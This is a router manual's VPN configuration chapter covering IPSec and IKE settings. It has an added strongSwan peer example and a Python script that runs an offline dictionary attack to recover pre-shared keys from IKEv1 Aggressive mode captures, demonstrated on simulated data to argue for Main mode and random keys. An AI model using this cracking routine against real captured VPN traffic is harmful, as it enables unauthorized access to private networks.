Chapter 4: Configuration
Configure a new VPN Connection
Connection Name:
A user-defined name for the connection (e.g. “connection to office”).
Local:
Network:
Set the IP address, subnet or address range of the local network. This is the local half of the traffic selector: only packets from these addresses are sent through the tunnel.
~
Single Address:
The IP address of the local host.
~
Subnet:
The subnet of the local network. For example, IP: 192.168.1.0 with netmask 255.255.255.0 specifies the 192.168.1.0/24 subnet, whose usable host addresses are 192.168.1.1 through 192.168.1.254.
~
IP Range:
The IP address range of the local network. For example, IP: 192.168.1.1, end IP: 192.168.1.10.
Remote:
Secure Gateway Address (or Domain Name):
The IP address or hostname of the remote VPN device (the IKE peer) with which the tunnel is established.
Network:
Set the IP address, subnet or address range of the remote network, i.e. the addresses that are reachable through the tunnel. The local and remote networks must not overlap, otherwise the router cannot tell tunnel-bound traffic from LAN traffic.
Proposal:
Select the IPSec security protocol. There are two, AH (Authentication Header) and ESP (Encapsulating Security Payload). AH authenticates the packet, including parts of the IP header, but does not encrypt it; ESP both encrypts and authenticates the payload. Use ESP: it is the only choice that gives confidentiality, and AH cannot pass through NAT because the address translation invalidates its integrity check.
Authentication:
Authentication establishes the integrity of the datagram and ensures it has not been tampered with in transit; the selected hash is used as an HMAC keyed with the IPSec SA key. There are three options, Message Digest 5 (MD5), Secure Hash Algorithm (SHA1) or NONE. SHA1 has the larger digest and is the stronger of the two at a slightly higher CPU cost; MD5 should only be selected when the peer offers nothing else. Never select NONE: it leaves the packets unauthenticated, so an attacker can modify the ciphertext without detection.
~
MD5:
A one-way hashing algorithm that produces a 128 bit hash.
~
SHA1:
A one-way hashing algorithm that produces a 160 bit hash.
Encryption:
Select the encryption method from the pull-down menu. There are several options, DES, 3DES, AES (128, 192 and 256) and NULL. NULL means the tunnel carries traffic with no encryption (authentication only). 3DES and AES cost more router CPU time than DES and so add latency, but AES is the only option on this list that is considered secure today and should be the default choice.
~
DES:
Stands for Data Encryption Standard. It uses a 56 bit key, which can be brute-forced with commodity hardware; do not use it.
~
3DES:
Stands for Triple Data Encryption Standard. It uses a 168 bit (3 x 56) key, but a meet-in-the-middle attack reduces its effective strength to about 112 bits, and its 64 bit block size limits the amount of data that should be sent under one key (the Sweet32 attack). Use it only when the peer cannot do AES.
~
AES:
Stands for Advanced Encryption Standard. You can use 128, 192 or 256 bit keys; all three are considered secure.
Perfect Forward Secrecy:
Choose whether to enable PFS. With PFS, a fresh Diffie-Hellman exchange is performed during the second (IPSec) phase of VPN negotiation, so the data encryption keys are not derived from the phase 1 secret and a compromise of one key does not expose traffic protected under earlier or later keys. This provides better security but extends the negotiation time. Diffie-Hellman is a public-key cryptography protocol that allows two parties to establish a shared secret over an unsecured communication channel (i.e. over the Internet). There are three groups, MODP 768-bit (DH group 1), MODP 1024-bit (DH group 2) and MODP 1536-bit (DH group 5). MODP stands for Modular Exponential group. The 768-bit group offers no meaningful security today and 1024-bit is marginal; select 1536-bit unless the peer cannot.
Pre-shared Key:
This is the key for the Internet Key Exchange (IKE) protocol, a string from 4 to 128 characters. Both sides must use the same key. IKE is used to establish a shared security policy and authenticated keys for services (such as IPSec) that require a key. Before any IPSec traffic can be passed, each router must be able to verify the identity of its peer; with this method that is done by manually entering the same pre-shared key on both sides (router or hosts). Use a long, randomly generated key rather than a word or phrase: a short or dictionary key can be recovered offline by anyone who captures an Aggressive mode exchange (see IKE Mode under Advanced Option below), and the field accepts up to 128 characters.
Select the Apply button to apply your changes.
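The fields above map one-to-one onto a standard IKEv1 site-to-site configuration. As an added example that is not part of the manual, here is what the other end of the tunnel looks like when the peer is a Linux host running strongSwan; the hostnames, addresses and subnets are placeholders from the documentation ranges, and the comments name the router field each line corresponds to.

```conf
# /etc/ipsec.conf on the strongSwan peer (example, not the router's own configuration).
conn office
    keyexchange=ikev1
    aggressive=no                 # router: IKE Mode = Main
    authby=secret                 # router: Pre-shared Key
    ike=aes256-sha1-modp1536!     # router: IKE Proposal = AES-256, SHA1, MODP 1536 ("!" = accept nothing weaker)
    esp=aes256-sha1-modp1536!     # router: Proposal = ESP, AES-256, SHA1; the DH group here turns on PFS
    ikelifetime=240m              # router: Phase 1 (IKE) SA lifetime, default 240 minutes
    lifetime=60m                  # router: Phase 2 (IPSec) SA lifetime, default 60 minutes
    left=%defaultroute
    leftid=@branch.example.com    # router: Remote ID (FQDN; the "@" means the name is not resolved)
    leftsubnet=192.168.2.0/24     # router: Remote Network
    right=203.0.113.10            # the router's WAN address; on the router this side is "Secure Gateway Address"
    rightid=@www.ipsectest.com    # router: Local ID
    rightsubnet=192.168.1.0/24    # router: Local Network
    dpdaction=restart             # counterpart of the router's PING for Keepalive
    dpddelay=10s
    auto=start

# A line such as  ike=des-md5-modp768  would accept DES, MD5 and DH group 1. All three
# are offered in the router's menus and none of them should be selected.

# /etc/ipsec.secrets: the same string entered in the router's Pre-shared Key field.
@branch.example.com @www.ipsectest.com : PSK "replace-with-a-long-random-string"
```

Keep the lifetimes equal on both sides; if the peer re-keys earlier than the router expects, the tunnel is interrupted at the peer's interval rather than the one configured here.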
Advanced Option
This function is only available after an IPSec account has been created. Click Advanced Option to change the following settings:
IKE (Internet Key Exchange) Mode:
Select Main mode or Aggressive mode for the IKE phase 1 exchange, which performs authenticated key generation and key management. Main mode uses six messages and sends the peers' identities and authentication hashes only after the Diffie-Hellman exchange, so they are encrypted on the wire. Aggressive mode uses three messages and sends the identity and the pre-shared-key-based hash in the clear, which lets a passive attacker test candidate pre-shared keys offline; it is normally needed only when the remote peer has a dynamic address and must identify itself by name. Prefer Main mode.
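The offline attack mentioned under Pre-shared Key and IKE Mode above is easy to see once the hash construction is written out. The following Python is an added example, not code from the manual or the router: it recomputes HASH_R exactly as RFC 2409 defines it for pre-shared-key authentication and runs a dictionary over a simulated Aggressive mode capture. The nonces, cookies, DH public values and SA payload body are constructed placeholders of realistic length; the function names are mine.

```python
import hashlib
import hmac
import os
import secrets

# What a sniffer sees in an IKEv1 Aggressive mode exchange (RFC 2409, section 5.4):
#   message 1 (initiator): SA, KE (g^xi), Ni, IDii, cookie CKY-I
#   message 2 (responder): SA, KE (g^xr), Nr, IDir, HASH_R, cookie CKY-R
# Every input to HASH_R except the pre-shared key is therefore on the wire.
# In Main mode HASH_I and HASH_R travel in messages 5 and 6, encrypted with a key
# derived from g^xy, so the same dictionary attack needs the DH secret as well.
ID_FQDN = 2  # ISAKMP identification type for a domain name such as www.ipsectest.com


def id_payload(fqdn: str) -> bytes:
    """ID payload body: ID type, protocol ID, port, then the identification data."""
    return bytes([ID_FQDN, 0, 0, 0]) + fqdn.encode()


def skeyid(psk: bytes, ni: bytes, nr: bytes, prf: str = "sha1") -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b); prf is HMAC with the negotiated hash."""
    return hmac.new(psk, ni + nr, prf).digest()


def hash_r(psk: bytes, ex: dict, prf: str = "sha1") -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    key = skeyid(psk, ex["ni"], ex["nr"], prf)
    msg = ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"] + ex["sai_b"] + ex["idir_b"]
    return hmac.new(key, msg, prf).digest()


def capture(psk: bytes, responder_id: str = "www.ipsectest.com",
            prf: str = "sha1", rnd=os.urandom) -> dict:
    """Simulate the fields a passive attacker records. All values are constructed:
    nonces, cookies and DH public values are random bytes of realistic length and
    sai_b stands in for the raw SA payload body the initiator sent."""
    ex = {
        "ni": rnd(16), "nr": rnd(16),        # nonces
        "gxi": rnd(192), "gxr": rnd(192),    # DH public values (MODP 1536 = 192 bytes)
        "cky_i": rnd(8), "cky_r": rnd(8),    # ISAKMP cookies
        "sai_b": rnd(48),                    # placeholder for the initiator's SA payload body
        "idir_b": id_payload(responder_id),
    }
    ex["hash_r"] = hash_r(psk, ex, prf)      # sent in the clear in message 2
    return ex


def crack(ex: dict, candidates, prf: str = "sha1"):
    """Offline dictionary attack: recompute HASH_R per candidate; no further traffic needed."""
    for cand in candidates:
        if hmac.compare_digest(hash_r(cand, ex, prf), ex["hash_r"]):
            return cand
    return None


def generate_psk(length: int = 64) -> str:
    """A random key no wordlist will contain; the router field accepts up to 128 characters."""
    return secrets.token_urlsafe(length)[:length]


if __name__ == "__main__":
    wordlist = [b"password", b"office", b"office123", b"vpn"]
    print("weak key recovered:", crack(capture(b"office123"), wordlist))
    print("random key recovered:", crack(capture(generate_psk().encode()), wordlist))
```

The loop is the whole attack: one HMAC per candidate, with no interaction with the router and nothing for an intrusion detection system to see. The only defence this page offers is the key itself, so pick Main mode where the peer allows it and, in either mode, a key generated as in generate_psk rather than a memorable phrase.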
IKE Proposal:
Hash Function:
The message digest algorithm used, as an HMAC, to authenticate the IKE exchange and derive its keys; it converts a message of any length into a fixed-length digest. The choices are MD5 (Message Digest 5) and SHA-1 (Secure Hash Algorithm). SHA1 is the stronger of the two and only marginally slower; prefer it.
~
MD5:
A one-way hashing algorithm that produces a 128 bit hash.
~
SHA1:
A one-way hashing algorithm that produces a 160 bit hash.
Encryption:
Select the encryption method for the IKE (phase 1) exchange from the pull-down menu. The options are DES, 3DES and AES (128, 192 and 256). 3DES and AES cost more CPU time than DES and so add latency; use AES here as well, for the reasons given under the IPSec proposal above.
~
DES:
Stands for Data Encryption Standard. It uses a 56 bit key and can be brute-forced; do not use it.
~
3DES:
Stands for Triple Data Encryption Standard. It uses a 168 bit (3 x 56) key with an effective strength of about 112 bits.
~
AES:
Stands for Advanced Encryption Standard. You can use 128, 192 or 256 bit keys.
Diffie-Hellman Group:
Selects the group for the phase 1 Diffie-Hellman exchange. Diffie-Hellman is a public-key cryptography protocol that allows two parties to establish a shared secret over an unsecured communication channel (i.e. over the Internet). There are three groups, MODP 768-bit (DH group 1), MODP 1024-bit (DH group 2) and MODP 1536-bit (DH group 5). MODP stands for Modular Exponential group. Choose 1536-bit: 768-bit offers no meaningful security today and 1024-bit is marginal.
Local ID:
~
Type:
Specify the local ID type.
~
Content:
Enter the ID's value, for example the domain name www.ipsectest.com.
Remote ID:
~
Type:
Specify the remote ID type.
~
Identifier:
Enter the remote ID's value, for example the domain name www.ipsectest.com.
The local ID entered here must match the remote ID configured on the peer, and vice versa, type included; a mismatch fails phase 1 authentication. A domain name ID is compared as a string and is not resolved by IKE, so it need not exist in DNS.
SA Lifetime:
Specify the number of minutes that a Security Association (SA) stays active before new encryption and authentication keys are exchanged. There are two kinds of SA, IKE and IPSec. IKE negotiates and establishes SAs on behalf of IPSec; the IKE SA itself protects the IKE negotiation.
Phase 1 (IKE):
Lifetime of the IKE SA created by the initial connection request for a new VPN tunnel. The range is 5 to 15,000 minutes, and the default is 240 minutes.
Phase 2 (IPSec):
Lifetime of the IPSec SA that carries the protected data traffic. The range is 5 to 15,000 minutes, and the default is 60 minutes.
A short SA lifetime increases security by forcing the two parties to re-key more often. However, every time the VPN tunnel re-negotiates, access through the tunnel is temporarily interrupted. Configure the same lifetimes on both peers so that re-keying happens at the interval chosen here rather than whenever the peer expires first.
PING for Keepalive:
Used to detect IPSec tunnel connection failure. A connection failure is defined as an aborted tunnel or one in the NO response state. In that event, PING for Keepalive takes action to restore the IPSec connection.
PING to the IP:
The router pings the remote host at the specified IP address and raises an alert when the ping fails. Once the alert is raised, the router drops the tunnel and re-establishes the connection. The default setting is 0.0.0.0, which disables the function. Choose an address inside the remote network that is always up (for example the remote gateway's LAN address) so that the ping is carried through the tunnel and actually tests it.
Interval:
Sets the time interval between pings to the IP used to monitor the connection status. The default is 10 seconds. The interval can be set from 0 to 3600 seconds; 0 disables the function.
Ping to the IP                         Interval (sec)   Action
0.0.0.0                                0                No
0.0.0.0                                2000             No
xxx.xxx.xxx.xxx (a valid IP address)   0                No
xxx.xxx.xxx.xxx (a valid IP address)   2000             Yes, ping every 2000 seconds.
Disconnection Time after no traffic:
This is the NO Response timer. When the tunnel has carried no traffic for longer than the Disconnection Time, the router automatically halts the tunnel and re-establishes it according to the Reconnection Time. The default setting is 1200 seconds; 180 seconds is the minimum.
Reconnection Time:
The interval after which the router reconnects once the tunnel has been halted for NO TRAFFIC. The default setting is 15 minutes; 3 minutes is the minimum.
Select the Apply button to update the settings.
